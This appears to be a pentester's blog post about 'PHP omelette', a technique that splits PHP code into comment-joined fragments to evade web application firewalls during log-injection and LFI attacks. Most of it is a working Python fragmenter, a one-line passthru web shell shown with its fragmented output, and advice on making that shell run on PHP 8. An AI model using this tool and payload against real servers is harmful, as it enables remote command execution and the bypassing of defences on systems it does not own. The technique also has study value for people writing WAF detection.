PHP omelette, code fragmentation for scripting languages
Code fragmentation is not exactly a new technique: in binary exploitation, techniques like the egg hunter and the omelette refer to various ways of bootstrapping a larger payload from a smaller one. However, when I needed to bypass a modern WAF on a pentest where I could inject a user-controlled value into a log file that could then be executed via LFI, I came up with this technique to fragment the payload so that it is split across many lines but still executes as if it were consecutive function calls. I was waiting to release this at a future conference talk, but as Robin recently wrote a blog post using a similar technique to execute fragmented JavaScript, I thought the time was right to release it now.
Concept
The broad concept is:
- Everything inside the <?php ?> tags is code
- Everything inside /* */ multi-line comments is ignored
- PHP parsing has some flexibility
The preferred use of this is to inject a small stager payload, but bigger files could be transformed as well.
The steps are simple enough that they can be performed manually:
- Add comment after all opening tags
- Add comment before all closing tags
- Add comments before and after semicolons
- Add comment after commas
- Add comments before and after opening and closing parentheses
- Remove duplicate comments
- Insert new line before each closing multi line comment
- Remove empty lines
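As an added example (this is not the php-omelette tool's own code, which lives in the repository linked at the end of the post), the following Python re-implements the eight steps above, with one safeguard the manual procedure does not mention: string literals are detected first and left untouched, so a `;`, `,` or `(` inside a quoted string never gets a comment spliced into it. The function names and the `defragment` round-trip check are this example's own, and it assumes short stager-style input without heredocs or `//` / `#` line comments.

```python
"""Omelette-style fragmentation of a PHP snippet (added example, not the php-omelette tool).

Implements the eight manual steps from the post. One safeguard the steps do not
mention is added: string literals are detected first and left untouched, so a
';', ',' or '(' inside "..." or '...' never gets a comment spliced into it.
Assumptions: short stager-style input with no heredoc/nowdoc and no // or #
line comments (a quote inside such a comment would confuse the string scanner).
"""
import re

COMMENT = "/**/"  # the empty comment inserted between tokens


def _split_strings(code):
    """Split PHP source into (is_string, text) segments.

    Single- and double-quoted literals, with backslash escapes, become string
    segments; everything else is code. Unterminated literals run to the end.
    """
    segments, buf, i, n = [], [], 0, len(code)
    while i < n:
        quote = code[i]
        if quote in "'\"":
            if buf:
                segments.append((False, "".join(buf)))
                buf = []
            j = i + 1
            while j < n and code[j] != quote:
                if code[j] == "\\":  # skip the escaped character
                    j += 1
                j += 1
            segments.append((True, code[i:j + 1]))
            i = j + 1
        else:
            buf.append(quote)
            i += 1
    if buf:
        segments.append((False, "".join(buf)))
    return segments


def _fragment_code(text):
    """Steps 1-7 on a code segment (string segments are skipped by the caller)."""
    # 1. comment after opening tags; the space keeps '<?php' / '<?=' a valid token
    text = re.sub(r"<\?(php|=)?", lambda m: m.group(0) + " " + COMMENT, text, flags=re.I)
    # 2. comment before closing tags
    text = text.replace("?>", COMMENT + "?>")
    # 3. comments before and after semicolons
    text = text.replace(";", COMMENT + ";" + COMMENT)
    # 4. comment after commas
    text = text.replace(",", "," + COMMENT)
    # 5. comments before and after parentheses (brackets stay, so $_GET[cmd] is one line)
    text = re.sub(r"[()]", lambda m: COMMENT + m.group(0) + COMMENT, text)
    # 6. collapse duplicate comments
    while COMMENT + COMMENT in text:
        text = text.replace(COMMENT + COMMENT, COMMENT)
    # 7. newline before every closing comment, so each token lands on its own line
    return text.replace("*/", "\n*/")


def fragment(code):
    """Return the fragmented PHP: one token per line, lines joined by /* */ comments."""
    pieces = [text if is_str else _fragment_code(text) for is_str, text in _split_strings(code)]
    # 8. remove empty lines
    return "\n".join(line for line in "".join(pieces).split("\n") if line.strip())


def defragment(fragmented):
    """Undo the transform (a sanity check): strip the inserted comment/newline pairs."""
    return fragmented.replace("/*\n*/", "")


if __name__ == "__main__":
    print(fragment("<?=passthru($_GET[cmd]);?>"))
```

Running it on the one-liner from the post reproduces the tool output shown below line for line, and `defragment` confirms that stripping the `/*`/`*/` pairs gives back the original statement. One caveat for current targets: `$_GET[cmd]` relies on an unquoted array key, which PHP 7 treats as an undefined constant that falls back to the string `'cmd'` (with a warning), while PHP 8 throws an Error for undefined constants. On PHP 8 quote the key; because the quotes mark a string segment, `$_GET['cmd']` fragments cleanly as well.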
./omelette '<?=passthru($_GET[cmd]);?>'
[omelette ASCII-art banner, justanotherhacker.com, omitted]
<?= /*
*/passthru/*
*/(/*
*/$_GET[cmd]/*
*/)/*
*/;/*
*/?>
Or if fragmenting code from a file:
./omelette "$(cat t/shell3.php)" > plate
The various scripts to fragment and inject the code can be found at: https://github.com/wireghoul/php-omelette. While aimed at PHP, the generic methods outlined above can be applied to many languages that share the /* */ block comment syntax, including JavaScript, C/C++ and others.